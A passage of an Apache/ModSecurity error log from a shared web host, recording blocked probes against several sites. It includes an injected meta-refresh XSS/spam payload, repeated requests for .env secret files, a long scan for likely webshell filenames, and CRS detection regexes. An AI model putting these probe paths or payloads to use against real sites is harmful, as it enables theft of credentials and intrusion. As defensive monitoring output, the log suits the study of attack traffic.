"OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjERdw2n9wv6Ai48QkAAAAI4"]
[Mon May 11 12:16:44.947029 2026] [security2:error] [pid 1254328:tid 1254399] [client 194.233.64.127:53667] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://W.Kepenktrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@Forum.Annecy-Outdoor.com/suivi_forum/?a[]=<a href=https://Cleanuri.com/nmBBV1>Kampus Terbaik Di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjERdw2n9wv6Ai48QkAAAAI4"]
[Mon May 11 12:16:44.947431 2026] [security2:error] [pid 1254328:tid 1254399] [client 194.233.64.127:53667] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjERdw2n9wv6Ai48QkAAAAI4"]
[Mon May 11 12:16:44.948133 2026] [security2:error] [pid 1254328:tid 1254399] [client 194.233.64.127:53667] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGsjERdw2n9wv6Ai48QkAAAAI4"]
[Mon May 11 12:16:51.299284 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:28514] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env.local-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rest/.env.local-hotfix"] [unique_id "agGsk5kIEwRJMyDaV55XOgAAAUA"]
[Mon May 11 12:16:51.299659 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:28514] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rest/.env.local-hotfix"] [unique_id "agGsk5kIEwRJMyDaV55XOgAAAUA"]
[Mon May 11 12:16:53.093199 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:28514] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsk5kIEwRJMyDaV55XOgAAAUA"]
[Mon May 11 12:16:53.119742 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:14460] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env.local-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rest/.env.local-hotfix"] [unique_id "agGslZkIEwRJMyDaV55XOwAAAUc"]
[Mon May 11 12:16:53.120176 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:14460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rest/.env.local-hotfix"] [unique_id "agGslZkIEwRJMyDaV55XOwAAAUc"]
[Mon May 11 12:16:55.019390 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:14460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGslZkIEwRJMyDaV55XOwAAAUc"]
[Mon May 11 12:16:55.812553 2026] [:error] [pid 1254179:tid 1254197] [client 114.119.143.207:22181] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=index&systpl=six&language=chinese
[Mon May 11 12:16:59.024555 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:14496] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /restapi/.env.prod.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/restapi/.env.prod.archived"] [unique_id "agGsmxjZymfuKpjWXeiF1QAAAM8"]
[Mon May 11 12:16:59.025117 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:14496] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/restapi/.env.prod.archived"] [unique_id "agGsmxjZymfuKpjWXeiF1QAAAM8"]
[Mon May 11 12:17:00.423490 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:14496] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsmxjZymfuKpjWXeiF1QAAAM8"]
[Mon May 11 12:17:00.448445 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:14512] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /restapi/.env.prod.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/restapi/.env.prod.archived"] [unique_id "agGsnBjZymfuKpjWXeiF1gAAANY"]
[Mon May 11 12:17:00.449182 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:14512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/restapi/.env.prod.archived"] [unique_id "agGsnBjZymfuKpjWXeiF1gAAANY"]
[Mon May 11 12:17:02.617831 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:14512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGsnBjZymfuKpjWXeiF1gAAANY"]
[Mon May 11 12:17:11.894401 2026] [security2:error] [pid 1254133:tid 1254160] [client 45.133.170.250:55995] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGspxjZymfuKpjWXeiF4AAAANg"], referer: https://www.piregwan-genesis.com/
[Mon May 11 12:17:59.453517 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/hhf.php
[Mon May 11 12:17:59.661353 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/amba5.php
[Mon May 11 12:17:59.868314 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/fvvff.php
[Mon May 11 12:18:00.068053 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/about.php
[Mon May 11 12:18:00.504310 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/tfm.php
[Mon May 11 12:18:00.696184 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wp-good.php
[Mon May 11 12:18:00.889684 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ioxi-o.php
[Mon May 11 12:18:01.085693 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/edit.php
[Mon May 11 12:18:01.277297 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/inputs.php
[Mon May 11 12:18:01.486812 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/a7.php
[Mon May 11 12:18:01.678355 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ms-edit.php
[Mon May 11 12:18:01.978345 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/insta.php
[Mon May 11 12:18:02.170014 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/t.php
[Mon May 11 12:18:02.381041 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/s.php
[Mon May 11 12:18:02.580419 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/CDX6.php
[Mon May 11 12:18:02.776632 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/100.php
[Mon May 11 12:18:02.968233 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/0x.php
[Mon May 11 12:18:03.117901 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:46664] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ruby/.env.save.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/ruby/.env.save.alpha"] [unique_id "agGs274KNmD_mZ_vlf9CMwAAAFM"]
[Mon May 11 12:18:03.118558 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:46664] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/ruby/.env.save.alpha"] [unique_id "agGs274KNmD_mZ_vlf9CMwAAAFM"]
[Mon May 11 12:18:03.161227 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/abc.php
[Mon May 11 12:18:03.608586 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/drykl.php
[Mon May 11 12:18:03.951232 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/term.php
[Mon May 11 12:18:04.144242 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/155.php
[Mon May 11 12:18:04.350140 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/bolt.php
[Mon May 11 12:18:04.548964 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/koiy.php
[Mon May 11 12:18:04.752551 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/amp.php
[Mon May 11 12:18:04.841294 2026] [security2:error] [pid 1254242:tid 1254264] [client 185.177.72.9:46664] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs274KNmD_mZ_vlf9CMwAAAFM"]
[Mon May 11 12:18:04.868716 2026] [security2:error] [pid 1254179:tid 1254199] [client 185.177.72.9:46676] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ruby/.env.save.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/ruby/.env.save.alpha"] [unique_id "agGs3GS6k_SCYd1AVZq4DQAAARI"]
[Mon May 11 12:18:04.869401 2026] [security2:error] [pid 1254179:tid 1254199] [client 185.177.72.9:46676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/ruby/.env.save.alpha"] [unique_id "agGs3GS6k_SCYd1AVZq4DQAAARI"]
[Mon May 11 12:18:05.056957 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/solo1.php
[Mon May 11 12:18:05.249829 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/8.php
[Mon May 11 12:18:05.442859 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/jp.php
[Mon May 11 12:18:05.634383 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/jga.php
[Mon May 11 12:18:05.826866 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/gelio1.php
[Mon May 11 12:18:06.033350 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/222.php
[Mon May 11 12:18:06.225074 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/666.php
[Mon May 11 12:18:06.251684 2026] [security2:error] [pid 1254179:tid 1254199] [client 185.177.72.9:46676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs3GS6k_SCYd1AVZq4DQAAARI"]
[Mon May 11 12:18:06.441324 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/166.php
[Mon May 11 12:18:06.634258 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/classwithtostring.php
[Mon May 11 12:18:06.826243 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/tool.php
[Mon May 11 12:18:07.018900 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/file61.php
[Mon May 11 12:18:07.229935 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/atomlib.php
[Mon May 11 12:18:07.421619 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/elp.php
[Mon May 11 12:18:07.799391 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wp-blog-header.php
[Mon May 11 12:18:08.001036 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/gk.php
[Mon May 11 12:18:08.192742 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wen.php
[Mon May 11 12:18:08.394707 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/cilus.php
[Mon May 11 12:18:08.586179 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wp-p2r3q9c8k4.php
[Mon May 11 12:18:08.783705 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/tires.php
[Mon May 11 12:18:08.975210 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wp9.php
[Mon May 11 12:18:09.186136 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/xltt.php
[Mon May 11 12:18:09.715285 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/menu.php
[Mon May 11 12:18:09.935054 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/1.php
[Mon May 11 12:18:10.126658 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wp-access.php
[Mon May 11 12:18:10.326201 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/wp-png.php
[Mon May 11 12:18:10.721324 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/144.php
[Mon May 11 12:18:11.111839 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/asasx.php
[Mon May 11 12:18:11.303468 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/asd.php
[Mon May 11 12:18:11.494960 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ws75.php
[Mon May 11 12:18:11.645867 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:46732] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rust/.env.debug-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rust/.env.debug-hotfix"] [unique_id "agGs45kIEwRJMyDaV55XiwAAAVE"]
[Mon May 11 12:18:11.646127 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:46732] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rust/.env.debug-hotfix"] [unique_id "agGs45kIEwRJMyDaV55XiwAAAVE"]
[Mon May 11 12:18:11.688789 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/academy.php
[Mon May 11 12:18:11.880521 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/ws86.php
[Mon May 11 12:18:12.072040 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/b.php
[Mon May 11 12:18:12.263545 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/amax.php
[Mon May 11 12:18:12.457785 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/as.php
[Mon May 11 12:18:12.672289 2026] [:error] [pid 1254133:tid 1254139] [client 20.226.81.141:44720] File does not exist: /home/sierraim/public_html/xa.php
[Mon May 11 12:18:12.819499 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:46732] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGs45kIEwRJMyDaV55XiwAAAVE"]
